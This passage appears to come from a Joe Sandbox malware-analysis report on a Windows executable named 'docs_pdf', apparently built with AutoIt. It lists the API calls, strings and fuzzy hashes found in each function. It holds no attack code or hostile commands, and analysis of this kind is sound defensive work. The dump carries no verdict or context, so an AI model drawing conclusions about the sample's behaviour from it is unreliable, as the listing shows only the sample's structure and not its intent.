                                                              • Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7
                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001495DF
                                                            • GetDlgCtrlID.USER32 ref: 001495EA
                                                            • GetParent.USER32 ref: 00149606
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00149609
                                                            • GetDlgCtrlID.USER32(?), ref: 00149612
                                                            • GetParent.USER32(?), ref: 0014962E
                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00149631
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1536045017-1403004172
                                                            • Opcode ID: b5b87c8499972b4962ce7564487a2b27b16b62d28ccc7b6250fff8d5444cbdad
                                                            • Instruction ID: eaa71a718ff3e4efb995a35c35244d6aee92299ec4398fdc194ec4aebffbb44e
                                                            • Opcode Fuzzy Hash: b5b87c8499972b4962ce7564487a2b27b16b62d28ccc7b6250fff8d5444cbdad
                                                            • Instruction Fuzzy Hash: 1E21B374D40208BFDF05AB64CCC5EFFBB78EF59300F10411ABA11971A2DB75999A9A20
                                                            APIs
                                                            • GetParent.USER32 ref: 00149651
                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00149666
                                                            • _wcscmp.LIBCMT ref: 00149678
                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001496F3
                                                            Strings
                                                            Similarity
                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                            • API String ID: 1704125052-3381328864
                                                            • Opcode ID: 8379100ba3a18ccee74ccdbbd8d98d54f7046ab385b59faae2065791a858598a
                                                            • Instruction ID: 7ce473a81698f941058402589847d5e595055e89eeb12eb1ea484432ffa319d5
                                                            • Opcode Fuzzy Hash: 8379100ba3a18ccee74ccdbbd8d98d54f7046ab385b59faae2065791a858598a
                                                            • Instruction Fuzzy Hash: E7114C7A648307BAFA092620DC0BDE7779CDB16770F210137F910A50F5FFA169D14A58
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00168BEC
                                                            • CoInitialize.OLE32(00000000), ref: 00168C19
                                                            • CoUninitialize.OLE32 ref: 00168C23
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00168D23
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00168E50
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00182C0C), ref: 00168E84
                                                            • CoGetObject.OLE32(?,00000000,00182C0C,?), ref: 00168EA7
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00168EBA
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00168F3A
                                                            • VariantClear.OLEAUT32(?), ref: 00168F4A
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                            • String ID:
                                                            • API String ID: 2395222682-0
                                                            • Opcode ID: 1e3affde282385d831f0c4c7e8cc777647e58eeeddc62ec5195ee38164519d0e
                                                            • Instruction ID: b60ac559921c74945d173abb7af540ccbef8a8f07ef592a990e3c7c77747be90
                                                            • Opcode Fuzzy Hash: 1e3affde282385d831f0c4c7e8cc777647e58eeeddc62ec5195ee38164519d0e
                                                            • Instruction Fuzzy Hash: B0C12671208305AFC700DF64C88496BB7E9FF89748F104A6DF58A9B251DB71ED46CB62
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 0015419D
                                                            • __swprintf.LIBCMT ref: 001541AA
                                                              • Part of subcall function 001138D8: __woutput_l.LIBCMT ref: 00113931
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 001541D4
                                                            • LoadResource.KERNEL32(?,00000000), ref: 001541E0
                                                            • LockResource.KERNEL32(00000000), ref: 001541ED
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0015420D
                                                            • LoadResource.KERNEL32(?,00000000), ref: 0015421F
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0015422E
                                                            • LockResource.KERNEL32(?), ref: 0015423A
                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0015429B
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                            • String ID:
                                                            • API String ID: 1433390588-0
                                                            • Opcode ID: 27aa1a5ed2ee42f7756be3f881efa7c6c2f30eb648e7af4cbdb66ad604ab2759
                                                            • Instruction ID: 04cf3f62dad8082f2b01837f704a173b29dc301f1da8a89eaadeca4a2a0749a9
                                                            • Opcode Fuzzy Hash: 27aa1a5ed2ee42f7756be3f881efa7c6c2f30eb648e7af4cbdb66ad604ab2759
                                                            • Instruction Fuzzy Hash: 0A319D7160521AABDB119F60EC48ABF7BB8EF08306F004529FC25D6551D770DAD2CBA0
                                                            APIs
                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000FFC06
                                                            • OleUninitialize.OLE32(?,00000000), ref: 000FFCA5
                                                            • UnregisterHotKey.USER32(?), ref: 000FFDFC
                                                            • DestroyWindow.USER32(?), ref: 00134A00
                                                            • FreeLibrary.KERNEL32(?), ref: 00134A65
                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00134A92
                                                            Strings
                                                            Similarity
                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                            • String ID: close all
                                                            • API String ID: 469580280-3243417748
                                                            • Opcode ID: 0b22caf58c37ba5679948633321cee2614b361661f8e7b4cfeb0b4712a2e5731
                                                            • Instruction ID: 3d259396526bcc8ebac1c6d66c1b1f12b21edba2d8173801c0a4f8b94ae5c93f
                                                            • Opcode Fuzzy Hash: 0b22caf58c37ba5679948633321cee2614b361661f8e7b4cfeb0b4712a2e5731
                                                            • Instruction Fuzzy Hash: B8A18B30701216CFCB29EF14C995A79F3A4BF14700F1442ADEA0AAB662DB30ED56DF94
                                                            APIs
                                                            • EnumChildWindows.USER32(?,0014AA64), ref: 0014A9A2
                                                            Strings
                                                            Similarity
                                                            • API ID: ChildEnumWindows
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 3555792229-1603158881
                                                            • Opcode ID: 93f4745d459a83157f4af86d91ce04857a310afdd4be002b8013ace8e5fe475f
                                                            • Instruction ID: 2af89441c99f6832027b4ebd022f7839028d85dc7bac3dcd8a4b22f5bf7eae1e
                                                            • Opcode Fuzzy Hash: 93f4745d459a83157f4af86d91ce04857a310afdd4be002b8013ace8e5fe475f
                                                            • Instruction Fuzzy Hash: 6991C570A40206EBDF1CDF60C481BE9FB74FF14314F928129E999A71A1DF306A99DB91
                                                            APIs
                                                            • SetWindowLongW.USER32(?,000000EB), ref: 000F2EAE
                                                              • Part of subcall function 000F1DB3: GetClientRect.USER32(?,?), ref: 000F1DDC
                                                              • Part of subcall function 000F1DB3: GetWindowRect.USER32(?,?), ref: 000F1E1D
                                                              • Part of subcall function 000F1DB3: ScreenToClient.USER32(?,?), ref: 000F1E45
                                                            • GetDC.USER32 ref: 0012CF82
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0012CF95
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0012CFA3
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0012CFB8
                                                            • ReleaseDC.USER32(?,00000000), ref: 0012CFC0
                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0012D04B
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                            • String ID: U
                                                            • API String ID: 4009187628-3372436214
                                                            • Opcode ID: a5a885229cf2f2319a9c925348463d17920d80918efb7900ba20d346aabf3b47
                                                            • Instruction ID: b2e45d9e22c43cb5217ce1504a356cccf026f0031b2b7123a6247bda9a680f9a
                                                            • Opcode Fuzzy Hash: a5a885229cf2f2319a9c925348463d17920d80918efb7900ba20d346aabf3b47
                                                            • Instruction Fuzzy Hash: 9571C531500209DFCF258F64E984AFE7BB5FF49350F244269FE559A1A6C7318C91DBA0
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                              • Part of subcall function 000F2344: GetCursorPos.USER32(?), ref: 000F2357
                                                              • Part of subcall function 000F2344: ScreenToClient.USER32(001B67B0,?), ref: 000F2374
                                                              • Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000001), ref: 000F2399
                                                              • Part of subcall function 000F2344: GetAsyncKeyState.USER32(00000002), ref: 000F23A7
                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0017C2E4
                                                            • ImageList_EndDrag.COMCTL32 ref: 0017C2EA
                                                            • ReleaseCapture.USER32 ref: 0017C2F0
                                                            • SetWindowTextW.USER32(?,00000000), ref: 0017C39A
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0017C3AD
                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0017C48F
                                                            Strings
                                                            Similarity
                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 1924731296-2107944366
                                                            • Opcode ID: ff90dd4528c555edcac39dd63afdc2fbd5c37f68fde382b08f91a1324bcacfe9
                                                            • Instruction ID: 71cd32c06c1abb80e834f5d1e8d1ff97a49134799be981ede0c40ca878925539
                                                            • Opcode Fuzzy Hash: ff90dd4528c555edcac39dd63afdc2fbd5c37f68fde382b08f91a1324bcacfe9
                                                            • Instruction Fuzzy Hash: 63519D70204304AFD704DF24C895FAA7BF5FB98310F00862DF6598B2A2CB349999DB52
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0017F910), ref: 0016903D
                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0017F910), ref: 00169071
                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001691EB
                                                            • SysFreeString.OLEAUT32(?), ref: 00169215
                                                            Similarity
                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                            • String ID:
                                                            • API String ID: 560350794-0
                                                            APIs
                                                            • _memset.LIBCMT ref: 0016F9C9
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0016FB5C
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0016FB80
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0016FBC0
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0016FBE2
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0016FD5E
                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0016FD90
                                                            • CloseHandle.KERNEL32(?), ref: 0016FDBF
                                                            • CloseHandle.KERNEL32(?), ref: 0016FE36
                                                            Similarity
                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                            • String ID:
                                                            • API String ID: 4090791747-0
                                                            APIs
                                                              • Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001538D3,?), ref: 001548C7
                                                              • Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001538D3,?), ref: 001548E0
                                                              • Part of subcall function 00154CD3: GetFileAttributesW.KERNEL32(?,00153947), ref: 00154CD4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00154FE2
                                                            • _wcscmp.LIBCMT ref: 00154FFC
                                                            • MoveFileW.KERNEL32(?,?), ref: 00155017
                                                            Similarity
                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                            • String ID:
                                                            • API String ID: 793581249-0
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0017896E
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0012C547
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0012C569
                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0012C581
                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0012C59F
                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0012C5C0
                                                            • DestroyIcon.USER32(00000000), ref: 0012C5CF
                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0012C5EC
                                                            • DestroyIcon.USER32(?), ref: 0012C5FB
                                                              • Part of subcall function 0017A71E: DeleteObject.GDI32(00000000), ref: 0017A757
                                                            Similarity
                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                            • String ID:
                                                            • API String ID: 2819616528-0
                                                            APIs
                                                              • Part of subcall function 0014AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0014AE77
                                                              • Part of subcall function 0014AE57: GetCurrentThreadId.KERNEL32 ref: 0014AE7E
                                                              • Part of subcall function 0014AE57: AttachThreadInput.USER32(00000000,?,00149B65,?,00000001), ref: 0014AE85
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00149B70
                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00149B8D
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00149B90
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00149B99
                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00149BB7
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00149BBA
                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00149BC3
                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00149BDA
                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00149BDD
                                                            Similarity
                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                            • String ID:
                                                            • API String ID: 2014098862-0
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00148A84,00000B00,?,?), ref: 00148E0C
                                                            • HeapAlloc.KERNEL32(00000000,?,00148A84,00000B00,?,?), ref: 00148E13
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00148A84,00000B00,?,?), ref: 00148E28
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00148A84,00000B00,?,?), ref: 00148E30
                                                            • DuplicateHandle.KERNEL32(00000000,?,00148A84,00000B00,?,?), ref: 00148E33
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00148A84,00000B00,?,?), ref: 00148E43
                                                            • GetCurrentProcess.KERNEL32(00148A84,00000000,?,00148A84,00000B00,?,?), ref: 00148E4B
                                                            • DuplicateHandle.KERNEL32(00000000,?,00148A84,00000B00,?,?), ref: 00148E4E
                                                            • CreateThread.KERNEL32(00000000,00000000,00148E74,00000000,00000000,00000000), ref: 00148E68
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: Variant$ClearInit$_memset
                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                            • API String ID: 2862541840-625585964
                                                            APIs
                                                              • Part of subcall function 00147652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?,?,0014799D), ref: 0014766F
                                                              • Part of subcall function 00147652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 0014768A
                                                              • Part of subcall function 00147652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 00147698
                                                              • Part of subcall function 00147652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?), ref: 001476A8
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00169B1B
                                                            • _memset.LIBCMT ref: 00169B28
                                                            • _memset.LIBCMT ref: 00169C6B
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00169C97
                                                            • CoTaskMemFree.OLE32(?), ref: 00169CA2
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 00169CF0
                                                            Similarity
                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 1300414916-2785691316
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00177093
                                                            • SendMessageW.USER32(?,00001036,00000000,?), ref: 001770A7
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 001770C1
                                                            • _wcscat.LIBCMT ref: 0017711C
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00177133
                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00177161
                                                            Strings
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat
                                                            • String ID: SysListView32
                                                            • API String ID: 307300125-78025650
                                                            APIs
                                                              • Part of subcall function 00153E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00153EB6
                                                              • Part of subcall function 00153E91: Process32FirstW.KERNEL32(00000000,?), ref: 00153EC4
                                                              • Part of subcall function 00153E91: CloseHandle.KERNEL32(00000000), ref: 00153F8E
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0016ECB8
                                                            • GetLastError.KERNEL32 ref: 0016ECCB
                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0016ECFA
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0016ED77
                                                            • GetLastError.KERNEL32(00000000), ref: 0016ED82
                                                            • CloseHandle.KERNEL32(00000000), ref: 0016EDB7
                                                            Strings
                                                            Similarity
                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 2533919879-2896544425
                                                            • Opcode ID: 01fe51a69be71ce2a269e0ab2c67e7b91bd1a8c6768a4bbd4a40ab81a0fdb59b
                                                            • Instruction ID: dbc4965ced60eab5edfc57e030e979e96df1a4c6a4ca7fef69a35e1c3f3d8188
                                                            • Opcode Fuzzy Hash: 01fe51a69be71ce2a269e0ab2c67e7b91bd1a8c6768a4bbd4a40ab81a0fdb59b
                                                            • Instruction Fuzzy Hash: 8741A9712042019FDB24EF24CC96FBEB7A1AF94714F18801CF9469B2D2DBB5A855CB92
                                                            APIs
                                                            • LoadIconW.USER32(00000000,00007F03), ref: 001532C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: IconLoad
                                                            • String ID: blank$info$question$stop$warning
                                                            • API String ID: 2457776203-404129466
                                                            • Opcode ID: f02012fa36270e122dc9b30c667bfdf2919e55f7fbf43f993f5af9e7cdcb4c84
                                                            • Instruction ID: a5ed30e2f80fe43f132d9d67e20feb67c8cad1c4755c443b9031ab42f085b955
                                                            • Opcode Fuzzy Hash: f02012fa36270e122dc9b30c667bfdf2919e55f7fbf43f993f5af9e7cdcb4c84
                                                            • Instruction Fuzzy Hash: 2911053520C74AFAE7095A54DC42DAAB39CEF1A3B1F20002AFD30AB181E7A15B8545B5
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0015454E
                                                            • LoadStringW.USER32(00000000), ref: 00154555
                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0015456B
                                                            • LoadStringW.USER32(00000000), ref: 00154572
                                                            • _wprintf.LIBCMT ref: 00154598
                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001545B6
                                                            Strings
                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00154593
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wprintf
                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                            • API String ID: 3648134473-3128320259
                                                            • Opcode ID: fa41e5fb619462704892d89d41f5d4236ee96f5d260ea8ce81b2493e136e0e2f
                                                            • Instruction ID: c6e46cc59ec55f711d8c53c1b05b23d7704d07fd8f7fd3793c1c5aa533a5f23d
                                                            • Opcode Fuzzy Hash: fa41e5fb619462704892d89d41f5d4236ee96f5d260ea8ce81b2493e136e0e2f
                                                            • Instruction Fuzzy Hash: 64014FF6900208BFE750A7A09D89EE7777CE708301F4005A9BB49E6451EA749EC68B70
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0017D78A
                                                            • GetSystemMetrics.USER32(0000000F), ref: 0017D7AA
                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0017D9E5
                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0017DA03
                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0017DA24
                                                            • ShowWindow.USER32(00000003,00000000), ref: 0017DA43
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0017DA68
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0017DA8B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: 68f28173376999e8eda37c4c9f2c34feda6a5c12afae6d6241ced0e833501a8a
                                                            • Instruction ID: dcffead6069332d8d414f26a1dcd68252c05546e95d491cb80c0855c4b89780b
                                                            • Opcode Fuzzy Hash: 68f28173376999e8eda37c4c9f2c34feda6a5c12afae6d6241ced0e833501a8a
                                                            • Instruction Fuzzy Hash: BCB19971600219EBDF18CF68D985BAD7BB1BF48710F09C069ED889B295D734A990CB50
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000), ref: 000F2ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000,000000FF), ref: 000F2B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000), ref: 0012C46A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000), ref: 0012C4D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: c6a2e82cee354fcd88434815d4faa87e867272e2b981e19fae1418b9eaf21e12
                                                            • Instruction ID: fa58281a515144e52942e3eacb19ef9f2e07fe3d1026dfd9ed9f1b505223e4b8
                                                            • Opcode Fuzzy Hash: c6a2e82cee354fcd88434815d4faa87e867272e2b981e19fae1418b9eaf21e12
                                                            • Instruction Fuzzy Hash: 05411730208AC89BC7799B29DCA877F7BE2AB95300F15841DE34B86D60C7759882E752
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0015737F
                                                              • Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
                                                              • Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001573B6
                                                            • EnterCriticalSection.KERNEL32(?), ref: 001573D2
                                                            • _memmove.LIBCMT ref: 00157420
                                                            • _memmove.LIBCMT ref: 0015743D
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0015744C
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00157461
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00157480
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: d2275938d9b892356ee35fd8fb8cd3835c4e8fe29c299531590d31b9a61d4a7f
                                                            • Instruction ID: 4f0b4093335a0edf5f12afd36ebce2aae9dbabe2f6893d5eb18dd1400f49320f
                                                            • Opcode Fuzzy Hash: d2275938d9b892356ee35fd8fb8cd3835c4e8fe29c299531590d31b9a61d4a7f
                                                            • Instruction Fuzzy Hash: BE316E31D04205EBCB10DF64DC86AAFBB78FF49710B1441B9FD049B246DB709A95CBA0
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 0017645A
                                                            • GetDC.USER32(00000000), ref: 00176462
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0017646D
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00176479
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001764B5
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001764C6
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00179299,?,?,000000FF,00000000,?,000000FF,?), ref: 00176500
